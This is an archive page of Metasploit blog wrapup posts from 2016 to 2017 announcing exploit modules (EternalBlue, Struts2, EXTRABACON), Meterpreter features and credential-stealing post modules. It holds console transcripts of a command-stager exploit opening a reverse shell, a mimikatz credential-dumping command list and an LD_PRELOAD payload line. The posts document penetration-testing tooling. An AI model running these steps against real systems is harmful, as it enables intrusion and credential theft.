Skip navigation
All Places > Metasploit > Blog > Authors egypt
1 2 3 4 Previous Next

Metasploit

51 Posts authored by: egypt Employee
egypt

Metasploit Wrapup

Posted by egypt Employee May 26, 2017

It has been an intense couple of weeks in infosec since the last Wrapup and we've got some cool things for you in the latest update.

 

Hacking like No Such Agency

I'll admit I was wrong. For several years, I've been saying we'll never see another bug like MS08-067, a full remote hole in a default Windows service. While I'm not yet convinced that MS17-010 will reach the same scale as MS08-067 did, EternalBlue has already done substantial damage to the internet. Rapid7 bloggers covered a bunch of the details last week.

EternalBlue: Metasploit Module for MS17-010

 

Since the last Wrapup, we've added an exploit for EternalBlue that targets x64 on the Windows 7 kernel (including 2008 R2). Updates are in the works to cover x86 and other kernels. There is also a scanner that can reliably determine exploitability of MS17-010, as well as previous infection with DOUBLEPULSAR, the primary payload used by the original leaked exploit.

 

While EternalBlue was making all the headlines, we also landed an exploit module for the IIS ScStoragePathFromUrl bug (CVE-2017-7269) for Windows 2003 from the same dump. This one requires the victim to have WebDAV enabled, which isn't default but is really common, especially on webservers of that era. Since 2003 is End of Support, Microsoft is not going to release a patch.

 

Dance the Samba

In the few days since we spun this release, we also got a shiny new exploit module for Samba, the Unixy SMB daemon that runs on every little file sharing device ever. Expect some more discussion about it in the next wrapup. In the mean time, you can read more about the effects of the bug.

 

WordPress PHPMailer

WordPress, which powers large swaths of the internet, embeds a thing called PHPMailer for sending email, mostly for stuff like password resets. Earlier this May, security researcher Dawid Golunski published a vulnerability in PHPMailer. The vulnerability is similar to CVE-2016-10033, discovered by the same researcher. Both of these bugs allow you to control arguments to sendmail(1).

 

Now, vulns in WordPress core are kind of a big deal, since as previously mentioned, WP is deployed everywhere. Unfortunately (or maybe fortunately depending on your perspective), there is a big caveat -- Apache since 2.2.32 and 2.4.24 changes a default setting, HttpProtocolOptions to disallow the darker corners of RFC2616, effectively mitigating this bug for most modern installations.

 

The intrepid @wvu set forth to turn this into a Metasploit module and came out the other side with some shells and interesting discoveries that he'll cover in a more detailed technical post coming soon to a Metasploit Blog near you.

 

Railgun

While Meterpreter is a very powerful and flexible tool for post exploitation on its own, sometimes you need the flexibility to go beyond the functionality that it provides directly. There may be a special API that needs to be called to extract a credential, or a certain system call that is required to trigger an exploit. For a long time, Windows Meterpreter users have enjoyed the use of the Railgun extension, which provides a way to do just that, similar to FFI (Foreign Function Interface) that is available in many scripting languages, but operating remotely. Thanks to an enormous effort by Metasploit contributor, zeroSteiner, Linux users can now also take advantage of Railgun, as it is now implemented as part of Python Meterpreter! This functionality opens the door to many new post-exploitation module possibilities, including the ability to steal cleartext passwords from gnome-keyring. See zeroSteiner’s blog and his more technical companion piece for more details.

 

Steal all the things

This week's update also continues the fine tradition of Stealing All the Things(tm). The aforementioned gnome-keyring dumper allows you to steal passwords from a logged-in user. In a similar vein, if you have a shell on a JBoss server, post/multi/gather/jboss_gather will give you all the passwords. The fun thing about both of these is that they work on the principle that you have permission to read these things -- there is no exploit here, and nothing to be patched.

 

On the other side of things, auxiliary/admin/scada/moxa_credentials_recovery does take advantage of a vulnerability to grab all the creds from a cute little SCADA device.

 

New Modules

Exploit modules (10 new)

 

Auxiliary and post modules (6 new)

 

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

 

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Metasploit Wrapup

Posted by egypt Employee Mar 24, 2017

Faster, Meterpreter, KILL! KILL!

You can now search for and kill processes by name in Meterpreter with the new pgrep and pkill commands. They both have flags similar to the older ps command, allowing you to filter by architecture (-a), user (-u), or to show only child processes of the current session's process (-c). We've also added a -x flag to find processes with an exact match instead of a regex, if you're into that.

 

Fun with radiation

radio-stylin.jpg

Craig Smith has been killing it lately with all his hardware exploitation techniques. Check out his post from earlier this week for details of his latest work on integrating radio reconaissance with Metasploit via the HWBridge, including crafting and examining radio frequency packets, brute force via amplitude modulation, and more!

 

Java web things

 

This update includes modules for two fun Java things: Struts2 and WebSphere.

 

Struts is a Java web application framework often deployed on Tomcat, but it can run on any of the various servlet containers out there. The bug is in an error handler. Basically, if the Content-Type header sent by the client is malformed, it will cause an exception and send a stack trace back to the client. As part of its rendering process, Struts will treat the value of the header as part of a template. Templates can contain Object-Graph Navigation Language (OGNL) expressions meaning we get full code execution as the user running the web process. The exploit for this drops a file and runs it so your shells can strut their stuff.

 

WebSphere is an application server manager. It is particularly interesting because it is often used to deploy code to clusters of application servers, which means popping one box can potentially give you code execution on dozens more.

 

You used to pwn me on my cell phone

 

While MMS messages aren't as common of a phishing vector as email, they can potentially be highly successful late at night when you need those shells. Now you can send SMS and MMS messages with Metasploit, using any SMTP server including GMail or Yahoo servers. Pair this with a malicious attachment such as the one generated by android/fileformat/adobe_reader_pdf_js_interface, or a link to the Stagefright browser exploit (android/browser/stagefright_mp4_tx3g_64bit), and get that holla back.

 

New Modules

 

Exploit modules (6 new)

Auxiliary and post modules (10 new)

 

Get it

 

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

Spend the summer with Metasploit

 

I'm proud to announce that the Metasploit Project has been accepted as a mentor organization in the Google Summer of Code! For those unfamiliar with the program, their about page sums it up nicely:

Google Summer of Code is a global program focused on introducing students to open source software development. Students work on a 3 month programming project with an open source organization during their break from university.

 

This is an amazing program that helps remove the financial barriers of contributing to Open Source. Basically how it works is you (a university student) work on an Open Source project over the summer (12 weeks) with a mentor who has experience working on that project. As long as you keep at it and hit your milestones, Google gives you money along the way based on performance. Pay your rent, stock the fridge, get coffee, whatever.

 

Open Source is the heart of the Metasploit community, but it's more than that to me. It's the means by which we, as programmers, can help improve the world a little bit at a time. We all stand on the shoulders of giants, building greater things because others before us have built great things. Like many OSS contributors, I personally started contributing to an Open Source project because it allowed me to get my work done more efficiently. By working together on Open Source, we can help others get their work done too, and enable them to build greater things. By working on Metasploit in particular, you will be helping to democratize offensive security, improving the world by giving everyone access to the same techniques that bad guys use, so they can be better understood and mitigated.

 

If Metasploit is not where your heart lies, I encourage you to consider contributing to one of the other GSoC security projects.

 

We have a list of project ideas that will have you writing some awesome code for great justice. Most everything requires at least a little Ruby, but if you're more comfortable in C or Python, there are options for you as well. Whatever you choose, I'm super excited to see what you will accomplish.

 

Important dates to know:

  • Student Application Period - March 20, 2017 - April 3, 2017
  • Student Projects Announced - May 4, 2017

 

If you are interested in participating, you should definitely check out the rest of the GSoC timeline. You will need to apply to us and also through GSoC's application page when it goes live next week on March 20th.

 

So please come work with us. Be the shoulders others can stand on.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Jan 27, 2017

Welcome back to the Metasploit Weekly Wrapup! It's been a while since the last one, so quite a bit has happened in that time including 75 Pull Requests.

 

Stageless mettle

The rewrite of meterpreter for POSIX systems, mettle, now supports a stageless mode. You can now build standalone static executables for almost a dozen architectures and run them on everything from small home routers to cell phones to servers and mainframes. It can also take its configuration from the command line, so you don't even need a different executable for different handler locations.

 

UDP pivoting

The new mettle supports pivoting just like Windows meterpreter, and both have had some improvements for forwarding UDP packets in this update. This is particularly useful with auxiliary/scanner/discovery/udp_sweep, which tries a bunch of different protocol probes on a range of ports to quickly identify UDP services.

 

Android

Using APK injection to trojan an existing Android app is a cool trick for social engineering folks into installing your backdoor, and it can get you a lot of info from a phone. One downside is that Android's privilege seperation system prevents you from reading the data owned by other apps, so there are some things you might want to steal that you won't have access to. That's where Local Privilege Escalation exploits become essential. This week's update includes a new LPE for a relatively old vulnerability, the put_user bug which was exploited in the wild in 2013, as well as updates to the towelroot exploit allowing it to target more devices.

 

This week's update adds CSV and vCard output formats to Android Meterpreter's dump_contacts command. This means you can now dump an Android device's contact list in an importable format.

 

Ever find yourself in a situation where you can't back up your phone contacts normally? Meterpreter to the rescue! If you can shell your phone - which you should be able to if it's yours - the `dump_contacts` command now gives you the option of a normal text file, CSV, or vCard for the output format.

 

Here's how to use it:

 

meterpreter > dump_contacts -h
Usage: dump_contacts [options]
Get contacts list.

OPTIONS:

    -f   Output format for contacts list (text, csv, vcard)
    -h        Help Banner
    -o   Output path for contacts list


meterpreter > dump_contacts -f csv
[*] Fetching 4 contacts into list
[*] Contacts list saved to: contacts_dump_20170121174248.csv
meterpreter > dump_contacts -f vcard
[*] Fetching 4 contacts into list
[*] Contacts list saved to: contacts_dump_20170121174258.vcf

 

 

wget/curl command stagers

 

 

If you're familiar with command injections, you know that downloading a payload from a remote host and then executing it can be more efficient than writing the payload to the target incrementally.

 

This update brings wget(1) and curl(1) command stagers (CmdStager) to Metasploit in environments that need it most (read: embedded). With the option of HTTP or HTTPS, a small embedded device can now fetch payloads over either protocol.

 

To use the new command stagers in your module, you can set flavor: wget or flavor: curl in your execute_cmdstager call, or you can set the flavor in CmdStagerFlavor in your info hash. Lastly, if you're already running the module, you can change the flavor with CMDSTAGER::FLAVOR, but that'll work only if the module doesn't define a required flavor.

 

Here's an example of setting CMDSTAGER::FLAVOR:

 

msf > use exploit/linux/http/apache_continuum_cmd_exec 
msf exploit(apache_continuum_cmd_exec) > set rhost 192.168.33.129
rhost => 192.168.33.129
msf exploit(apache_continuum_cmd_exec) > set payload
linux/x64/mettle_reverse_tcp 
payload => linux/x64/mettle_reverse_tcp
msf exploit(apache_continuum_cmd_exec) > set cmdstager::flavor wget 
cmdstager::flavor => wget
msf exploit(apache_continuum_cmd_exec) > set lhost 192.168.33.1 
lhost => 192.168.33.1
msf exploit(apache_continuum_cmd_exec) > run

[*] Started reverse TCP handler on 192.168.33.1:4444 
[*] Injecting CmdStager payload...
[*] Using URL: http://0.0.0.0:8080/XlM6PUw74P
[*] Local IP: http://192.168.1.3:8080/XlM6PUw74P
[*] Meterpreter session 1 opened (192.168.33.1:4444 ->
192.168.33.129:55171) at 2017-01-27 13:27:54 -0600
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
meterpreter > 

 

Notice how small the command stager is. If we were to write the payload out with echo(1) or printf(1) or somesuch, we'd be sending the payload as hex strings... which will take a while to write to disk.

 

 

History command

Metasploit stores your msfconsole history in ~/.msf4/history but sometimes you only want dump out pieces of it. The new history command works similarly to the bash command of the same name letting you do just that.

 

workspace -v

The workspace command now takes a verbose flag to dump out some statistics about the stuff you've collected in each workspace. It shows the number of hosts, vulns, creds, loots, and notes.

 

11:52:25 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace
   default
   fbi
  * nasa
   wh.gov
11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) > workspace  -v
  Workspaces
  ==========
  current  name     hosts  services  vulns  creds  loots  notes
  -------  ----     -----  --------  -----  -----  -----  -----
           default  5      2         3      3      0      8
           fbi      98     165       49     155    301    72
  *        nasa     32     81        41     14     33     20
           wh.gov   1      9         0      0      0      0

11:52:45 192.168.99.1 nasa j:0 s:0 exploit(psexec) >

 

 

to_handler command

Complementing the handler command is another new command, to_handler, that does the same thing, but takes its settings from the context of the currently-selected payload module. At some point it is likely that these two things will be unified, but for now it's pretty useful as is.

 

12:07:10 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > options
  Module options (payload/windows/meterpreter/reverse_https):
     Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
    EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
    LHOST                      yes       The local listener hostname
    LPORT     8443             yes       The local listener port
    LURI                       no        The HTTP Path
12:07:11 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LHOST 192.168.99.1
LHOST => 192.168.99.1
12:07:27 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > 
12:07:29 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > set LPORT 8888
LPORT => 8888
12:07:39 192.168.99.1 nasa j:0 s:0 payload(reverse_https) > to_handler
[*] Payload Handler Started as Job 2
[*] Started HTTPS reverse handler on https://0.0.0.0:8888
[*] Starting the payload handler...
12:07:41 192.168.99.1 nasa j:1 s:0 payload(reverse_https) > jobs -v
  Jobs
  ====
   Id  Name                    Payload                            Payload opts               URIPATH  Start Time                 Handler opts
   --  ----                    -------                            ------------               -------  ----------                 ------------
   2   Exploit: multi/handler  windows/meterpreter/reverse_https  https://192.168.99.1:8888           2017-01-27 12:07:40 -0600  https://0.0.0.0:8888

 

Revamped kiwi

Meterpreter now has a revamped kiwi extension, replacing the old system of specific TLVs with a much simpler interface to the mimikatz command system. What that means for developers is a lot fewer moving parts between the two codebases and easier, streamlined updates. What that means for users is getting the latest and greatest mimikatz in Meterpreter a lot sooner.

 

This brings kiwi up to mimikatz version 2.1, and now works on Windows XP SP3 and Windows 2003 SP1 all the way up to 10 and 2016. In particular the new dcsync command is fabulous for stealing hashes from a domain controller. This grabs info from the DC's user database so, just like when parsing NTDS.dit, it gets historical hashes as well as the one currently in use for the given user.

 

As before, the kiwi client extension has commands for most of the things you want to get out of mimikatz:

Kiwi Commands
=============

    Command                Description
    -------                -----------

    creds_all              Retrieve all credentials (parsed)
    creds_kerberos         Retrieve Kerberos creds (parsed)
    creds_msv              Retrieve LM/NTLM creds (parsed)
    creds_ssp              Retrieve SSP creds
    creds_tspkg            Retrieve TsPkg creds (parsed)
    creds_wdigest          Retrieve WDigest creds (parsed)
    dcsync                 Retrieve user account information via DCSync (unparsed)
    dcsync_ntlm            Retrieve user account NTLM hash, SID and RID via DCSync
    golden_ticket_create   Create a golden kerberos ticket
    kerberos_ticket_list   List all kerberos tickets (unparsed)
    kerberos_ticket_purge  Purge any in-use kerberos tickets
    kerberos_ticket_use    Use a kerberos ticket
    kiwi_cmd               Execute an arbitary mimikatz command (unparsed)
    lsa_dump_sam           Dump LSA SAM (unparsed)
    lsa_dump_secrets       Dump LSA secrets (unparsed)
    wifi_list              List wifi profiles/creds

 

If that doesn't cover what you need, you can also send commands directly to the underlying mimikatz shell, so you can access everything that we don't have a direct wrapper for.

 

And then you run the most important command that mimikatz offers:

meterpreter > kiwi_cmd coffee

    ( (
     ) )
  .______.
  |      |]
  \      /
   `----'

New Modules

Exploit modules (6 new)

Auxiliary and post modules (4 new)

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Dec 16, 2016

Taking Care of Universal Business: the Handler's Tale

 

With a few exceptions, payloads have to have a handler. That's the guy who waits with the car while your exploit runs into the liquor store.

 

To run an exploit module, we have to select and configure a payload first. In some cases, Metasploit can do this for you automatically, by just guessing that you probably wanted the best payload for the target platform and architecture. Once the payload is set up, we have to have a way to talk to it -- that's the handler. For a reverse style payload like windows/meterpreter/reverse_tcp, Metasploit will open a listening socket on the attacker machine and wait for connections from the payload. For bind, style where the payload listens on the victim machine, Metasploit starts a loop attempting to connect to that listener. (When we talk about Metasploit payloads, we always call the payload the server and msfconsole the client, regardless of which direction the TCP session is going.)

 

Once the connection is established, two things can happen. First, if the handler is expecting a stageless payload, msfconsole sets up an interactive session that you can use to control the payload, whether that's a socket <-> terminal passthrough like a raw shell connection or the full-fledged client that meterpreter needs. If, on the other hand, the payload is staged, the handler needs to transmit more code for the first stage to read and run. When that's done, everything proceeds the same as for a stageless payload.

 

Either way, it is very important that the payload and the handler have matching settings. If a staged payload expects x86 shellcode and the handler thinks it is talking to a MIPS payload, the second stage will crash and you'll lose your shell despite having successfully achieved code execution. Similarly, if the payload is staged and the handler is stageless, the server will either a) wait forever for shellcode that will never come or b) it will take whatever you type into the console as shellcode, which will certainly fail unless your binary typing skills are significantly better than mine.

 

You usually don't have to worry too much about any of this, because everything is taken care of for you automatically when you type run. Where it gets complicated is when you need to have multiple payloads or run multiple exploits using the same listener port. To accomplish that, it is often useful to have a handler independent of an exploit. Metasploit has exploit/multi/handler, which is a special exploit module that isn't really an exploit, for exactly this purpose. All it does is allow you to configure a payload and run the handler for it.

 

This week's update introduces a new command, handler, which does all the same work as multi/handler (and in fact runs multi/handler in the background) all from a single command. This means you no longer have to move away from the context of the exploit you're working in to set up a handler.

 

Having independent handlers is also super useful for when you want create a payload outside of the current msfconsole.

 

The perfect example here is when using something like veil to generate executables that bypass antivirus for manual delivery. When the payload is not associated with an exploit, you have to tell Metasploit the details that it would normally have from the exploit's settings.

 

Unfortunately, there are a couple of disadvantages with this. First, it's error-prone. If the settings in your payload and handler don't match, like I mentioned above, things will crash and you'll be missing out on shells. Second, it requires multiple listening ports if you want to be able to handle multiple platforms or architectures. Sometimes that's not a big deal, but when you're dealing with organizations that have strong egress filtering, it can become an insurmountable hassle.

 

This week's update makes all reverse HTTP handlers use a single handler. This means you can run multi/handler (or the new handler command) to set up a single HTTP handler on port 443, with a real CA-signed certificate, and point staged and/or stageless meterpreters for any of the supported platforms all at the same place.

 

This isn't perfect yet. Native Linux Meterpreter and its up and coming replacement, Mettle, don't yet support HTTP, so they can't yet take advantage of the new handler. TCP payloads can theoretically do something similar, but the implementation will require changing the way stagers work, which is always challenging because of the extreme space restrictions they have to operate under and the fact that changing the staging protocol will make all existing stagers stop working. If you have ideas for how to accomplish that without breaking everyone's existing payloads, I'd love to hear them.

 

New Modules

 

Auxiliary and post modules (1 new)

 

Get it

 

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Metasploit Wrapup

Posted by egypt Employee Dec 9, 2016

Finding stuff

 

For a very long time, msfconsole's search command has used a union of the results of all search terms. This means that if you do something like search linux firefox, you'll get a list of all modules that mention linux, regardless of the application they target, and all modules that mention firefox, regardless of their platform. Most people are probably expecting the intersection, i.e. you probably wanted to see only the modules that target Firefox on Linux. So now that's what happens.

 

The exception is when you have two or more of a single keyword operator, like search arch:x86 arch:mips. That will still get you the union of those two, since arguably it makes more sense to see results for both in this case.

 

Stealing stuff

 

This release brings a new post module from Geckom: post/osx/gather/enum_messages, a module for gathering messages from the Messages app in OS X. With the ability to connect your phone to the Messages app, this module provides an easy way to steal 2FA tokens and other goodies from a connected phone, assuming you have an active session on the target machine.

 

The module supports a few operations: DBFILE for grabbing the SQLite DB directly, READABLE for collecting messages in a human readable format, LATEST for collecting only the latest message, and ALL for doing all of the above.

Here's an example of what to expect:

msf > use post/osx/gather/enum_messages
msf post(enum_messages) > set session -1
session => -1
msf post(enum_messages) > run


[+] [redacted]:56791 - Messages DB found: /Users/[redacted]/Library/Messages/chat.db
[+] [redacted]:56791 - Found Messages file: /Users/[redacted]/Library/Messages/chat.db
[*] [redacted]:56791 - Looting /Users/[redacted]/Library/Messages/chat.db database
[*] [redacted]:56791 - Generating readable format
[*] [redacted]:56791 - Retrieving latest messages
[+] [redacted]:56791 - Latest messages:


[+] [redacted]:56791 - messages.db stored as: /Users/[redacted]/.msf4/loot/20161207151127_default_[redacted]_messages.db_947304.db
[+] [redacted]:56791 - messages.txt stored as: /Users/[redacted]/.msf4/loot/20161207151127_default_[redacted]_messages.txt_801211.txt
[+] [redacted]:56791 - latest.txt stored as: /Users/[redacted]/.msf4/loot/20161207151127_default_[redacted]_latest.txt_986021.txt
[*] Post module execution completed
msf post(enum_messages) >

 

That's all there is to it! You can change the user to retrieve messages from by setting the USER option, or you can let the module work against the current user. If you want to retrieve more than three messages, you can change that with MSGCOUNT.

 

New Modules

 

Exploit modules (2 new)

Auxiliary and post modules (2 new)

 

Get it

 

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Metasploit Weekly Wrapup

Posted by egypt Employee Dec 2, 2016

Terminal velocity

 

The terminal/shell interface has been around for decades and has a rich and storied history. Readline is the main library for shells like msfconsole to deal with that interface, but it's also possible for commandline tools to print ANSI escape sequences that the terminal treats specially.

 

When a shell like msfconsole has asynchronous output going to the terminal at unpredictable times, such as when a new session connects, that output can clobber the current prompt. That makes it hard to tell what you're typing and slows you down.

 

These short videos, created by @jennamagius, the contributor who submitted this patch, illustrate the issue and the new behavior:

 

GoldenThoroughHummingbird.gif

 

LivelyDefiniteArrowana.gif

 

The old behavior has annoyed me for a long time and I'm super glad to see that typing into a prompt can still be usable when you have a ton of shells flying in.

 

New Modules

 

Exploit modules (4 new)

 

Auxiliary and post modules (1 new)

 

Get it

 

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Metasploit Wrapup

Posted by egypt Employee Nov 18, 2016

Everything old is new again

 

As you probably already know, hardware manufacturers are not always great at security. Today we'll be picking on Netgear, who produce a WiFi router called the WNR2200. This cute little device, brand new out of the box on store shelves today, runs Linux 2.6.15 with Samba 3.0.24. For those of you keeping score at home, those versions were released in 2007. Way back in 2007, Samba had a pre-auth heap buffer overflow vulnerability in the LsarLookupSids RPC call, for which Metasploit has had an exploit since shortly after the bug's disclosure.

 

Unfortunately for people who like shells, the exploit only worked on x86 targets, so popping these new routers with old exploits wasn't feasible. Until now. Thankfully, JanMitchell came to the rescue, porting it to MIPS for all your ridiculously-old-software-on-a-brand-new-router hacking needs.

 

Steal all the things

 

A few weeks ago, we talked about stealing AWS metadata. This update adds a post module (post/multi/gather/awks_keys) that will extract credential and other valuable AWS information from a compromised machine with aws console/cli installed and configured with credentials. These credentials can be used to access all of an AWS user's resources he/she has access to.

 

Book keeping

 

There won't be a release next week because of the Thanksgiving holiday here in the US. Automated nightly installers for the open source framework will still be automatically built nightly as you might expect.

 

New Modules

 

Exploit modules (8 new)

 

Auxiliary and post modules (6 new)

 

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.38...4.12.42

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Oct 28, 2016

What time is it?

 

If you want to run some scheduled task, either with schtasks or cron, you have to decide when to run that task. In both cases, the schedule is based on what time it is according to the victim system, so when you make that decision, it's super helpful to know what the victim thinks the current time is.

 

As of #7435, Meterpreter has a localtime command that gives you that information and then it's peanut butter jelly time.

 

DancingBannana.gif

 

 

Unicode

 

Windows uses UTF-16le to store hostnames (and pretty much everything else). For ASCII characters, you can convert to that format simply by inserting NULL bytes in between each ASCII byte. When you run into a hostname that uses characters for which there is no direct ASCII equivalent, conversion is a lot more complex. As of this weeek, that complexity works correctly for hostnames in Metasploit. This affects several things that use the SMB protocol, including smb_version, and the places where hostnames are displayed in msfconsole.

 

----- BENIGN CERTAIN -----

 

Along with Extra Bacon, the fun SNMP RCE bug for Cisco devices we mentioned here a couple months ago, the same dump included an information disclosure vulnerability in Cisco devices as well. The result is similar to what you get with Heartbleed - random memory contents that can sometimes contain credentials.

 

APK Injection

 

Android Application Packages (APK files) are very similar to JAR files. They're basically a zip archive with a certain directory structure. Android requries that APKs must be cryptographically signed before the system will allow you to install them. Earlier this year, we added the ability to use an existing APK as a template for your payload, but of course that makes the signature invalid. To fix it up, we re-sign with a new certificate.

 

As of this week, that certificate will match all of the metadata from the original template's signature which makes the installed app a bit less conscpicuous.

 

Local File Inclusion

 

In the world of PHP, Local File Includes or LFIs are a common vulnerability due to the nature of the language and how its include and require directives work. That class of vulnerability is a lot less common in other langauges, so it was a bit surprising when the details of CVE-2016-0752 came out. What was previously believed to be merely a local file read vulnerability in Ruby on Rails when the bug was first made public back in February, can actually be turned into a local file include vulnerability. This works because the file that Rails is reading is actually used as template that can contain. (Note that's ERB, not ERB.)

 

New Modules

 

This wrapup covers a few weeks, so the new module count is quite a bit higher than usual.

 

Exploit modules (9 new)

 

 

Auxiliary and post modules (6 new)

 

 

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.30...4.12.38

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Oct 7, 2016

Silence is golden

 

Taking screenshots of compromised systems can give you a lot of information that might otherwise not be readily available. Screenshots can also add a bit of extra spice to what might be an otherwise dry report. For better or worse, showing people that you have a shell on their system often doesn't have much impact. Showing people screenshots of their desktop can evoke a visceral reaction that can't be ignored. Plus, it's always hilarious seeing Microsoft Outlook open to the phishing email that got you a shell. In OSX, this can be accomplished with the module post/osx/capture/screenshot. Prior to this week's update, doing so would trigger that annoying "snapshot" sound, alerting your victim to their unfortunate circumstances. After a small change to that module, the sound is now disabled so you can continue hacking on your merry way, saving the big reveal for some future time when letting them know of your presence is acceptable.

 

Check your sums before you wreck your sums

 

Sometimes you just want to know if a particular file is the same as what you expect or what you've seen before. That's exactly what checksums are good at. Now you can run several kinds of checksums from a meterpreter prompt with the new checksum command. Its first argument is the hash type, e.g. "sha1" or "md5", and the rest are remote file names.

 

Metadata is best data, everyone know this

 

As more and more infrastructure moves to the cloud, tools for dealing with the various cloud providers become more useful.

 

If you have a session on an AWS EC2 instance, the new post/multi/gather/aws_ec2_instance_metadata can grab EC2 metadata, which "can include things like SSH public keys, IPs, networks, user names, MACs, custom user data and numerous other things that could be useful in EC2 post-exploitation scenarios." Of particular interest in that list is custom user data. People put all kinds of ridiculous things in places like that and I would guess that there is basically 100% probability that the EC2 custom field has been used to store usernames and passwords.

 

Magical ELFs

 

For a while now, msfvenom has been able to produce ELF library (.so) files with the elf-so format option. Formerly, these only worked with the normal linking system, i.e., it works when an executable loads it from /usr/lib or whatever but due to a couple of otherwise unimportant header fields, it didn't work with LD_PRELOAD. For those who are unfamiliar with LD_PRELOAD, it's a little bit of magic that allows the linker to load up a library implicitly rather than as a result of the binary saying it needs that library. This mechanism is often used for debugging, so you can stub out functions or make them behave differently when you're trying to track down a tricky bug.

 

It's also super useful for hijacking functions. This use case provides lots of fun shenanigans you can do to create a userspace rootkit, but for our purposes, it's often enough simply to run a payload so a command like this:

LD_PRELOAD=./mettle.so /bin/true

will result in a complete mettle session running inside a /bin/true process.

 

New Modules

 

Exploit modules (1 new)

Auxiliary and post modules (3 new)s

 

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.28...4.12.30

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Sep 30, 2016

Extra Usability

 

Commandline tools in general are powerful, but come with a learning curve. When you've been using a tool for a long time, that curve becomes a status quo that embeds itself in your fingers. That isn't always a good thing because it tends to make you blind to how things can be better and it takes an effort of introspection to notice inefficiencies. Even then, you weigh those inefficiencies against the effort required to improve.

 

An example of that is msfconsole's route command, which gets a bit of a spruce up this week. Instead of showing help output when given no arguments, it now shows the current routing table. In addition, it now supports using a session id of "-1" to indicate the most recent session, just like you can do for the SESSION option in post modules.

 

Extra privilege escalation

 

In the last few years, privilege escalation has become more important in the Windows world but it has always been a staple on Unix operating systems. This update brings two privilege escalation modules, one for the Linux kernel and one for NetBSD's /usr/libexec/mail.local, for your rooting pleasure.

 

Extra Meta Metasploitation

 

2ENTk2K2.pngAs I mentioned in the last wrapup, we've landed @justinsteven's modules for attacking Metasploit from Metasploit. The first, metasploit_static_secret_key_base, exploits the way Rails cookies are serialized and the fact that an update would step on the randomly generated secret key with a static one. Check out the full detailsif you're interested in how that works.

 

The second, metasploit_webui_console_command_execution, isn't a vulnerability as such. Rather, it takes advantage of the fact that admin users can run msfconsole in the browser, and therefore run commands on the server. This is the sort of thing that can't be patched without just removing the functionality altogether; it's literally a feature, not a bug. Authenticated administrators can do administrator things, as you might expect.

 

Extra Android Exploit

 

Stagefright_bug_logo.pngAt Derbycon last week, long-time friend of the Metasploit family, @jduck, released his latest version of Stagefright, an exploit for Android's libstagefright. He demo'd exploiting a Nexus device, but lots of other stuff is vulnerable too. Due to the rampant fragmentation in the Android world, this year-old bug is probably going to be showing up on new phones sitting on store shelves for quite a while yet.

 

Extra Bacon

Kevin_Bacon_2_SDCC_2014.jpg

And last but not least, this week brings a module for exploiting EXTRABACON, the Cisco ASA vulnerability made public by the Shadowbroker leak a few weeks ago. The bug is a buffer overflow in SNMP object id strings. The module does exactly what the Equation Group exploit does -- it disables authentication on the victim device and allows you to login to ssh or telnet with no password. This module was a collaboration between lots of folks and improves on the coverage in the original exploit, even adding targets for some 9.x devices that the advisory says are not affected.

 

This democratization of exploits through open source continues to show that being open and transparent leads to better exploits, more public knowledge, and better patches.

 

New Modules

 

Exploit modules (7 new)

 

Auxiliary and post modules (1 new)

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.25...4.12.28

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Sep 16, 2016

Security is hard

 

I usually focus exclusively on the Metasploit Framework here on these wrapups, but this week is a little special. This week the Metasploit commercial products (Pro, Express, and Community) come with a fix for a couple of vulnerabilities. You heard that right, remotely exploitable vulns in Metasploit. Our lovely engineering manager, Brent Cook, helpfully wrote up the details yesterday.

 

TL;DR - Three bugs, two of which work together: 1) the filter restricting the creation of the first admin account to localhost was broken. As has always been the case having an admin account on Metasploit lets you run commands on the server. And 2) the randomly generated session key got stepped on by a static one whenever updates were applied, so the same key was used for every Metasploit installation. Because of 3) session cookies are serialized ruby, so that's code exec, too.

 

